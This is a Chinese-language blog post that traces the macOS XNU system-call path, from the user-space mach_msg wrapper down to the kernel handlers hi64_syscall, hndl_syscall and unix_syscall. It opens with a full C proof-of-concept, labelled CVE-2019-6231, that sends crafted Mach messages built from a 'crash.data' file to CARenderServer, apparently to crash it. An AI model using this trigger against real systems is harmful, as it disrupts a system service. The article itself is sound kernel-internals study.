XNU系统调用深度解析

By xia0

XNU系统调用深度解析

从一个函数分析到系统调用的内核实现

由一段POC而起

#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/i386/kern_return.h>
#include <mach/mach_traps.h>
#include <servers/bootstrap.h>
#include <dirent.h>
#include <sys/stat.h>
#include <time.h>
#include <dlfcn.h>
#include <unistd.h>

/*
 * Message buffer used by main() for the client registration request
 * (msgh_id 40202). main() also receives the reply into this same buffer.
 *
 *   header  - Mach message header.
 *   body    - main() stores 4 here, matching the number of entries in ports
 *             (presumably the descriptor count of a complex message - confirm).
 *   ports   - four port descriptors; main() fills each with mach_task_self().
 *   padding - 12 extra bytes at the end of the buffer
 *             (NOTE(review): presumably room for the reply - confirm).
 */
typedef struct quartz_register_client_s {
        mach_msg_header_t          header;
        uint32_t                   body;
        mach_msg_port_descriptor_t ports[4];
        char                       padding[12];
} quartz_register_client_t;

/*
 * Message buffer used by main() for the second request (msgh_id 40002):
 * a Mach message header followed by a 712-byte opaque body that main()
 * fills from crash.data.
 */
typedef struct quartzcore_mach_msg {
        mach_msg_header_t header;
        char              msg_body[712];
} quartzcore_mach_msg_t;

/*
 * Return the size in bytes of the file at path fn.
 *
 * Returns 0 when fn is NULL or stat() fails (for example when the file does
 * not exist), instead of reading an uninitialised struct stat.
 */
uint64_t get_filesize(const char *fn){
        struct stat st;

        if (fn == NULL || stat(fn, &st) != 0) {
                return 0;
        }

        return (uint64_t)st.st_size;
}

int main(int argc, const char * argv[]) {



        mach_port_t p = MACH_PORT_NULL, bs_port = MACH_PORT_NULL;

        task_get_bootstrap_port(mach_task_self(), &bs_port);

        const char *render_service_name = "com.apple.CARenderServer";

        kern_return_t (*bootstrap_look_up)(mach_port_t, const char *, mach_port_t *) = dlsym(RTLD_DEFAULT, "bootstrap_look_up");

        kern_return_t kr = bootstrap_look_up(bs_port, render_service_name, &p);



        if (kr != KERN_SUCCESS) {

                return -1;

        }



        printf("[*] Get service of %s successully!\n", render_service_name);



        quartz_register_client_t msg_register;

        memset(&msg_register, 0, sizeof(msg_register));

        msg_register.header.msgh_bits =

        MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, MACH_MSG_TYPE_MAKE_SEND_ONCE) |

        MACH_MSGH_BITS_COMPLEX;

        msg_register.header.msgh_remote_port = p;

        msg_register.header.msgh_local_port = mig_get_reply_port();

        msg_register.header.msgh_id = 40202;  // _XRegisterClient



        msg_register.body = 4;

        msg_register.ports[0].name = mach_task_self();

        msg_register.ports[0].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[0].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[1].name = mach_task_self();

        msg_register.ports[1].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[1].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[2].name = mach_task_self();

        msg_register.ports[2].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[2].type = MACH_MSG_PORT_DESCRIPTOR;

        msg_register.ports[3].name = mach_task_self();

        msg_register.ports[3].disposition = MACH_MSG_TYPE_COPY_SEND;

        msg_register.ports[3].type = MACH_MSG_PORT_DESCRIPTOR;



        kr = mach_msg(&msg_register.header, MACH_SEND_MSG | MACH_RCV_MSG,

                                    sizeof(quartz_register_client_t), sizeof(quartz_register_client_t),

                                    msg_register.header.msgh_local_port, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        if (kr != KERN_SUCCESS) {

                return -1 ;

        }



        mach_port_t context_port = *(uint32_t *)((uint8_t *)&msg_register + 0x1c);

        uint32_t conn_id = *(uint32_t *)((uint8_t *)&msg_register + 0x30);



        printf("[*] context_port: 0x%x, conn_id: 0x%x\n",context_port,conn_id);



        char *crash_log = "crash.data"; //size is 736.



        FILE *fp = fopen(crash_log, "rb");

        if(fp == NULL){

                printf("fopen error!\n");

        }



        uint64_t fsize = get_filesize(crash_log);

        void *msg_buf = malloc(fsize);

        memset(msg_buf, 0, fsize);

        fread(msg_buf, fsize, 1, fp);



        quartzcore_mach_msg_t qc_mach_msg = {0};

        qc_mach_msg.header.msgh_bits = MACH_MSGH_BITS(MACH_MSG_TYPE_COPY_SEND, 0) | MACH_MSGH_BITS_COMPLEX;

        qc_mach_msg.header.msgh_remote_port = context_port;

        qc_mach_msg.header.msgh_id = 40002;



        memset(qc_mach_msg.msg_body, 0x0, sizeof(qc_mach_msg.msg_body));

        *(uint32_t *)(qc_mach_msg.msg_body + 0) = 0x1;  // Ports count

        memcpy(qc_mach_msg.msg_body+4+12, msg_buf+0x1c+0xc, 736-0x1c-0xc);

        *(uint32_t *)(qc_mach_msg.msg_body + 4 + 12 + 4) = conn_id;



        kr = mach_msg(&qc_mach_msg.header, MACH_SEND_MSG,736, 0, 0, MACH_MSG_TIMEOUT_NONE, MACH_PORT_NULL);

        if (kr != KERN_SUCCESS) {

                printf("[-] Send message failed: 0x%d\n", kr);

                return -1 ;

        }

        return 0;

}

里面的mach函数mach_msg()最终会执行到哪里?于是展开一段追踪。

从ida的导入表中可以看到这个函数实现在libSystem.B.dylib。顺便说下,这个动态库实际上只是一层封装,里面导入了/usr/lib/system下面的动态库。

* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1
    frame #0: 0x00007fff79299694 libsystem_kernel.dylib`mach_msg
libsystem_kernel.dylib`mach_msg:
->  0x7fff79299694 <+0>: pushq  %rbp
    0x7fff79299695 <+1>: movq   %rsp, %rbp
    0x7fff79299698 <+4>: pushq  %r15
    0x7fff7929969a <+6>: pushq  %r14
Target 0: (CVE-2019-6231-poc) stopped.

调试可以看出mach_msg实现在libsystem_kernel.dylib之中

(lldb) dis
libsystem_kernel.dylib`mach_msg:
->  0x7fff79299694 <+0>:   pushq  %rbp
    0x7fff79299695 <+1>:   movq   %rsp, %rbp
    0x7fff79299698 <+4>:   pushq  %r15
    0x7fff7929969a <+6>:   pushq  %r14
    0x7fff7929969c <+8>:   pushq  %r13
    0x7fff7929969e <+10>:  pushq  %r12
    0x7fff792996a0 <+12>:  pushq  %rbx
    0x7fff792996a1 <+13>:  subq   $0x28, %rsp
    0x7fff792996a5 <+17>:  movl   %ecx, %r13d
    0x7fff792996a8 <+20>:  movl   %esi, %ebx
    0x7fff792996aa <+22>:  movq   %rdi, %r14
    0x7fff792996ad <+25>:  movl   0x10(%rbp), %eax
    0x7fff792996b0 <+28>:  movl   %ebx, %r12d
    0x7fff792996b3 <+31>:  andl   $0xfffffbbf, %r12d        ; imm = 0xFFFFFBBF 
    0x7fff792996ba <+38>:  movl   %eax, (%rsp)
    0x7fff792996bd <+41>:  movl   %r12d, %esi
    0x7fff792996c0 <+44>:  movl   %edx, %r15d
    0x7fff792996c3 <+47>:  movl   %r8d, -0x2c(%rbp)
    0x7fff792996c7 <+51>:  movl   %r9d, -0x30(%rbp)
    0x7fff792996cb <+55>:  callq  0x7fff79299170            ; mach_msg_trap
    ...
/*
 * IDA pseudocode of the user-space mach_msg() wrapper.
 *
 * It calls mach_msg_trap() once and, if the result is one of two specific
 * error codes, keeps calling it until the result changes, unless the
 * corresponding bit in `option` is set.
 * The mach_msg_trap() calls are shown here without arguments; the
 * disassembly above loads registers before the call, so presumably the
 * arguments are simply not rendered in this listing.
 */
mach_msg_return_t __cdecl mach_msg(mach_msg_header_t *msg, mach_msg_option_t option, mach_msg_size_t send_size, mach_msg_size_t rcv_size, mach_port_name_t rcv_name, mach_msg_timeout_t timeout, mach_port_name_t notify)
{
  mach_msg_return_t result; // eax
  mach_msg_option_t v8; // er12

  result = mach_msg_trap();
  if ( !result )
    return 0;
  // 268435463 == 0x10000007; option bit 0x40 suppresses this retry.
  // NOTE(review): these look like MACH_SEND_INTERRUPTED / MACH_SEND_INTERRUPT
  // from <mach/message.h> - confirm against the SDK headers.
  if ( !(option & 0x40) && result == 268435463 )
  {
    do
      result = mach_msg_trap();
    while ( result == 268435463 );
  }
  v8 = option;
  // 268451845 == 0x10004005; bit 0xA of option (mask 0x400) suppresses this retry.
  // NOTE(review): these look like MACH_RCV_INTERRUPTED / MACH_RCV_INTERRUPT
  // from <mach/message.h> - confirm against the SDK headers.
  if ( !_bittest(&v8, 0xAu) && result == 268451845 )
  {
    do
      result = mach_msg_trap();
    while ( result == 268451845 );
  }
  return result;
}

通过调试和ida反汇编mach_msg函数可以看出,最终会调用mach_msg_trap这个函数,再跟一下

* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 3.1
    frame #0: 0x00007fff79299170 libsystem_kernel.dylib`mach_msg_trap
libsystem_kernel.dylib`mach_msg_trap:
->  0x7fff79299170 <+0>:  movq   %rcx, %r10
    0x7fff79299173 <+3>:  movl   $0x100001f, %eax          ; imm = 0x100001F 
    0x7fff79299178 <+8>:  syscall 
    0x7fff7929917a <+10>: retq   
Target 0: (CVE-2019-6231-poc) stopped.

这个函数后面会调用0x100001f系统调用,可以小结得到系统库封装了最底层的实现,最终通过系统调用进入内核。在用户层到这里已经就到头了,无法再跟进。

XNU内核系统调用流程

系统调用发生在内核之中,那么最开始处理系统调用的地方又在哪?通过intel官方文档可以找到

SYSCALL invokes an OS system-call handler at privilege level 0.
It does so by loading RIP from the IA32_LSTAR MSR

也就是内核需要将系统调用处理函数入口放到IA32_LSTAR这个MSR(model specific register)中。在内核源码中对应osfmk/i386/mp_desc.c里的cpu_syscall_init(cpu_data_t *cdp)函数

/*
 * Set MSRs for sysenter/sysexit and syscall/sysret for 64-bit.
 *
 * cdp is only passed to mt_cpu_up() when MONOTONIC is defined; otherwise it
 * is marked unused.
 */
void
cpu_syscall_init(cpu_data_t *cdp)
{
#if MONOTONIC
    mt_cpu_up(cdp);
#else /* MONOTONIC */
#pragma unused(cdp)
#endif /* !MONOTONIC */
    /* SYSENTER path: code segment, entry point (hi64_sysenter) and stack pointer. */
    wrmsr64(MSR_IA32_SYSENTER_CS, SYSENTER_CS); 
    wrmsr64(MSR_IA32_SYSENTER_EIP, DBLMAP((uintptr_t) hi64_sysenter));
    wrmsr64(MSR_IA32_SYSENTER_ESP, current_cpu_datap()->cpu_desc_index.cdi_sstku);
    /* Enable syscall/sysret */
    wrmsr64(MSR_IA32_EFER, rdmsr64(MSR_IA32_EFER) | MSR_IA32_EFER_SCE);

    /*
     * MSRs for 64-bit syscall/sysret
     * Note USER_CS because sysret uses this + 16 when returning to
     * 64-bit code.
     */
    /* SYSCALL loads RIP from IA32_LSTAR, so hi64_syscall becomes the 64-bit syscall entry point. */
    wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));
    wrmsr64(MSR_IA32_STAR, (((uint64_t)USER_CS) << 48) | (((uint64_t)KERNEL64_CS) << 32));
    /*
     * Emulate eflags cleared by sysenter but note that
     * we also clear the trace trap to avoid the complications
     * of single-stepping into a syscall. The nested task bit
     * is also cleared to avoid a spurious "task switch"
     * should we choose to return via an IRET.
     */
    wrmsr64(MSR_IA32_FMASK, EFL_DF|EFL_IF|EFL_TF|EFL_NT);

}

其中wrmsr64(MSR_IA32_LSTAR, DBLMAP((uintptr_t) hi64_syscall));这一行把hi64_syscall的地址写入了IA32_LSTAR,也就是说系统调用会由hi64_syscall函数处理。这个函数实现在xnu/osfmk/x86_64/idt64.s之中

/*
 * Entry point for the 64-bit SYSCALL instruction (the address that
 * cpu_syscall_init writes into MSR_IA32_LSTAR).
 *
 * Saves the user stack pointer, switches to the per-CPU exception stack,
 * builds an ISF frame there (SS, RIP, RSP, RFLAGS, CS, syscall code, trap
 * handler, trap number) and jumps to L_dispatch.
 */
Entry(hi64_syscall)
Entry(idt64_syscall)
    swapgs
     /* Use RAX as a temporary by shifting its contents into R11[32:63]
      * The systemcall number is defined to be a 32-bit quantity, as is
      * RFLAGS.
      */
    shlq    $32, %rax
    or     %rax, %r11
.globl EXT(dblsyscall_patch_point)
EXT(dblsyscall_patch_point):
//    movabsq    $0x12345678ABCDEFFFULL, %rax
     /* Generate offset to the double-mapped per-CPU data shadow
      * into RAX
      */
    leaq    EXT(idt64_hndl_table0)(%rip), %rax
    mov    16(%rax), %rax
    mov     %rsp, %gs:CPU_UBER_TMP(%rax)  /* save user stack */
    mov     %gs:CPU_ESTACK(%rax), %rsp  /* switch stack to per-cpu estack */
    sub    $(ISF64_SIZE), %rsp

    /*
     * Synthesize an ISF frame on the exception stack
     */
    movl    $(USER_DS), ISF64_SS(%rsp)
    mov    %rcx, ISF64_RIP(%rsp)        /* rip */

    /* Reload the user stack pointer saved above and store it in the frame. */
    mov    %gs:CPU_UBER_TMP(%rax), %rcx
    mov    %rcx, ISF64_RSP(%rsp)        /* user stack --changed */

    mov    %r11, %rax
    shrq    $32, %rax        /* Restore RAX */
    mov    %r11d, %r11d        /* Clear r11[32:63] */

    mov    %r11, ISF64_RFLAGS(%rsp)    /* rflags */
    movl    $(SYSCALL_CS), ISF64_CS(%rsp)    /* cs - a pseudo-segment */
    mov    %rax, ISF64_ERR(%rsp)        /* err/rax - syscall code */
    /* Record HNDL_SYSCALL as the trap handler for this frame. */
    movq    $(HNDL_SYSCALL), ISF64_TRAPFN(%rsp)
    movq    $(T_SYSCALL), ISF64_TRAPNO(%rsp)    /* trapno */
    swapgs
    jmp    L_dispatch            /* this can only be 64-bit */

继续跟下去,会得到如下执行流程

syscall-->hi64_syscall-->L_dispatch-->ks_dispatch-->ks_dispatch_user-->L_dispatch_U64-->
L_dispatch_64bit-->L_common_dispatch-->hndl_syscall
/*
 * 64bit Tasks
 * System call entries via syscall only:
 *
 *    r15     x86_saved_state64_t
 *    rsp     kernel stack
 *
 *    both rsp and r15 are 16-byte aligned
 *    interrupts disabled
 *    direction flag cleared
 *
 * Reads the saved RAX, masks out the syscall class and branches to the
 * handler for that class (mach, unix, machdep or diag). An unknown class
 * ends in i386_exception with EXC_SYSCALL.
 */

Entry(hndl_syscall)
    TIME_TRAP_UENTRY

    movq    %gs:CPU_ACTIVE_THREAD,%rcx    /* get current thread     */
    movl    $-1, TH_IOTIER_OVERRIDE(%rcx)    /* Reset IO tier override to -1 before handling syscall */
    movq    TH_TASK(%rcx),%rbx        /* point to current task  */

    /* Check for active vtimers in the current task */
    TASK_VTIMER_CHECK(%rbx,%rcx)

    /*
     * We can be here either for a mach, unix machdep or diag syscall,
     * as indicated by the syscall class:
     */
    movl    R64_RAX(%r15), %eax        /* syscall number/class */
    movl    %eax, %edx
    andl    $(SYSCALL_CLASS_MASK), %edx    /* syscall class */
    cmpl    $(SYSCALL_CLASS_MACH<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_mach_scall64)
    cmpl    $(SYSCALL_CLASS_UNIX<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_unix_scall64)
    cmpl    $(SYSCALL_CLASS_MDEP<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_mdep_scall64)
    cmpl    $(SYSCALL_CLASS_DIAG<<SYSCALL_CLASS_SHIFT), %edx
    je    EXT(hndl_diag_scall64)

    /* Syscall class unknown */
    sti
    CCALL3(i386_exception, $(EXC_SYSCALL), %rax, $1)
    /* no return */

hndl_syscall这个函数会将系统调用分为hndl_unix_scall64、hndl_mach_scall64、hndl_mdep_scall64、hndl_diag_scall64四类分别处理

这里以hndl_unix_scall64为例(下面贴出的是32位入口hndl_unix_scall的代码,64位的hndl_unix_scall64流程类似,只是最终调用的是unix_syscall64)

/*
 * Unix-class system call handler: bumps the thread's unix syscall counter,
 * checks the task's vtimers, executes sti and calls unix_syscall with %r15
 * as its single argument.
 */
Entry(hndl_unix_scall)

        TIME_TRAP_UENTRY

    movq    %gs:CPU_ACTIVE_THREAD,%rcx    /* get current thread     */
    movq    TH_TASK(%rcx),%rbx        /* point to current task  */
    incl    TH_SYSCALLS_UNIX(%rcx)        /* increment call count   */

    /* Check for active vtimers in the current task */
    TASK_VTIMER_CHECK(%rbx,%rcx)

    sti

    CCALL1(unix_syscall, %r15)
    /*
     * always returns through thread_exception_return
     */

这里调用了unix_syscall函数,这个函数在bsd/dev/i386/systemcalls.c之中实现,里面进行了一些权限检查

以及根据系统调用表去调用对应的实现

  thread = current_thread();
  uthread = get_bsdthread_info(thread);
  // regs is derived from r15 ...
  code = regs->rax & SYSCALL_NUMBER_MASK;
  callp = (code >= NUM_SYSENT) ? &sysent[63] : &sysent[code];
  // ...
  vt = (void *)uthread->uu_arg;
  // ...
  memcpy(vt, args_start_at_rdi ? &regs->rdi : &regs->rsi,
        args_in_regs * sizeof(syscall_arg_t));
  // ...
  error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0]));

目前执行的流程如下

hi64_syscall
L_dispatch_U64
L_dispatch_64bit
L_common_dispatch
hndl_syscall // rdx, pushed in hi64_syscall
hndl_unix_scall64
unix_syscall64
error = (*(callp->sy_call))((void *)p, vt, &(uthread->uu_rval[0])); // now we're there

参考

https://www.binss.me/blog/interrupt-and-exception/

https://0xax.gitbooks.io/linux-insides/content/SysCall/linux-syscall-2.html

https://gist.github.com/yrp604/23e86dce9ca12bf514ef